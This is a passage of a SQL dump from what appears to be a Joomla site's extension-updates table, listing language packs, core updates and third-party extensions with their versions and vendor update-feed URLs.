Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(9071,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(9072,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9073,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9074,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9075,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9076,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9077,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9078,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9079,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9080,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9081,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9082,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9083,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9084,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9085,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9086,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9087,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9088,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9089,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9090,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9091,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9092,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9093,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9094,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9095,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9096,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9097,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9098,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9099,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9100,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9101,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9102,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9103,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9104,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9105,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9106,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9107,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9108,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9109,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9110,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9111,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9112,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9113,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9114,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9115,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9116,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9117,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9118,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9119,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.9','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-9.html			\n		',''),(9120,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(9121,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(9122,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9123,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9124,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9125,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9126,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9127,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9128,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9129,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9130,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9131,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9132,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9133,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9134,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9135,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9136,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9137,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9138,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9139,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9140,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9141,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9142,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9143,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9144,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9145,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9146,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9147,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9148,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9149,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9150,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9151,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9152,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9153,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9154,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9155,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9156,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9157,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9158,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9159,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9160,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9161,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9162,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9163,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9164,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9165,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9166,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9167,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9168,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9169,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9170,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9171,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9172,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9173,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9174,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9175,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9176,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9177,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9178,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9179,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9180,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9181,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9182,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9183,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9184,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9185,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9186,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9187,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9188,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9189,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9190,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9191,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9192,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(9193,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(9194,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(9195,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(9196,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(9197,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(9198,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(9199,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9200,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9201,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9202,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9203,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9204,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9205,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9206,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9207,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9208,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9209,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9210,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9211,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9212,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9213,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9214,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9215,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9216,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9217,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9218,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9219,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9220,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9221,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9222,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9223,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9224,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9225,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9226,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9227,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9228,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9229,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9230,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9231,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9232,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9233,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9234,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9235,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9236,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9237,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9238,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9239,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9240,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9241,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9242,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9243,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9244,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9245,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9246,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.9','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-9.html			\n		',''),(9247,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(9248,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(9249,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9250,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9251,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9252,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9253,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9254,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9255,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9256,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9257,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9258,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9259,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9260,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9261,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9262,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9263,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9264,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9265,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9266,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9267,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9268,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9269,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9270,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9271,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9272,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9273,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9274,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9275,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9276,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9277,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9278,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9279,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9280,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			